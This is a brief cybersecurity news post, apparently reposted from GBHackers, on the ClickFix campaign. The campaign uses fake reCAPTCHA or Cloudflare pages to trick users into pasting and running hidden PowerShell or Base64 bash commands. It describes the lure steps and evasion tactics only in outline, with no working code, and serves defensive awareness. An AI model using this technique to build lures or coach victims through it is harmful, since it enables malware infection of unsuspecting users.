Cybersecurity firm Guardio has uncovered a new campaign, ClickFix, that weaponizes fake CAPTCHA verification pages to trick users into executing malicious commands marking a major evolution from 2024’s fake browser update scams.
Victims encounter CAPTCHA pages branded with Google reCAPTCHA or Cloudflare logos, but instead of solving a puzzle, they’re instructed to perform keyboard shortcuts (e.g., Windows+R → Ctrl+V → Enter) that run hidden PowerShell commands copied to the clipboard.
Initially focused on Windows, the attacks used heavily obfuscated PowerShell payloads to fetch and execute remote code, bypassing signature-based detection. The campaign has since expanded to macOS instructing users to run Base64-encoded bash commands via Terminal and Linux, making it a multi-platform threat.
Attackers host these malicious flows on Google Scripts, leveraging its trusted infrastructure to evade security filters. Infrastructure analysis shows organized operations with distinct attacker clusters; one group consistently uses. run and. press domains and clean PowerShell syntax, indicating automated toolkits.
By removing file downloads and using trusted brands, Click Fix increases user compliance while reducing detection risk signaling a new wave of browser-based social engineering attacks targeting users across all major platforms.
The ClickFix campaign marks a significant evolution in browser-based social engineering, replacing obvious malware downloads with interactive, brand-impostor CAPTCHA prompts that exploit human trust and familiarity with routine actions. By leveraging trusted platforms like Google Scripts and expanding beyond Windows to macOS and Linux, attackers are broadening their reach while reducing their detection footprint. This shift highlights the critical need for user awareness training, behavioral detection systems, and strict browser security policies to counter increasingly deceptive multi-platform threats.
Source Link — https://gbhackers.com/fake-captcha-used-in-new-clickfix-attack/
#CyberSecurity #ClickFix #SocialEngineering #FakeCaptcha #PowerShellAttacks #MultiPlatformThreat #WindowsSecurity #MacOSSecurity #LinuxSecurity #GoogleScripts #ThreatIntelligence #Phishing #UserAwareness #BrowserSecurity #GuardioResearch
